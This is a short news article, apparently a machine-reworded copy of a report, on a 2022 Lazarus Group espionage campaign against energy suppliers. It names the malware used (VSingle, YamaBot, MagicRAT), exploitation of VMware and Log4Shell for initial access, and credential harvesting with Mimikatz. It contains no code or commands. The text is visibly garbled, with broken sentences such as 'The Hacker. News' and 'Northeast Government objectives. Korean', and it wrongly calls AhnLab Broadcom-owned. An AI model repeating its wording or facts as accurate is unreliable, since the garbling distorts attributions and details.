A malicious campaign mounted by the North Korea-linked Lazarus Group targeted energy suppliers around the world, including those based in the United States, Canada and Japan, between February and July 2022.
“The campaign is intended to infiltrate organizations around the world to establish long-term access and then exfiltrate data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared with The Hacker. News.
Some elements of the spy attacks have already entered the public domain, thanks to earlier reports from Symantec and Broadcom-owned AhnLab earlier in April and May. Symantec attributed the operation to a group called Stonefly, a subgroup of Lazarus better known as Andariel, Guardian of Peace, OperationTroy, and Silent Chollima.
While these attacks previously led to the instrumentation of Preft (aka Dtrack) and NukeSped (aka Manuscrypt) implants, the latest wave of attacks stands out for the use of two other malware: VSingle, an HTTP bot that runs arbitrary code from a remote network, and a Golang backdoor called YamaBot.
The campaign also uses a new remote access Trojan called MagicRAT, which has capabilities to evade detection and launch additional payloads at infected systems.
“Although the same tactics were applied in both attacks, the resulting malicious implants deployed are distinct from each other, indicating the wide variety of available implants at Lazarus’s disposal,” said researchers Jung soo An. , Asheer Malhotra and Vitor Ventura. .
Initial access to corporate networks is facilitated by exploiting vulnerabilities in VMware products (e.g., Log4Shell) with the ultimate goal of establishing ongoing access to perform activities in support of Northeast Government objectives. Korean.
Using VSingle in an attack chain would have allowed the threat actor to perform a variety of activities such as reconnaissance, exfiltration, and manual backdooring, giving operators a solid understanding of the threat. environment of the victim.
Other tactics adopted by the group besides the use of bespoke malware include harvesting credentials through tools such as Mimikatz and Procdump, disabling antivirus components, and scouting Active Directory services. , and even taking steps to clean up their tracks after activating backdoors on the terminal.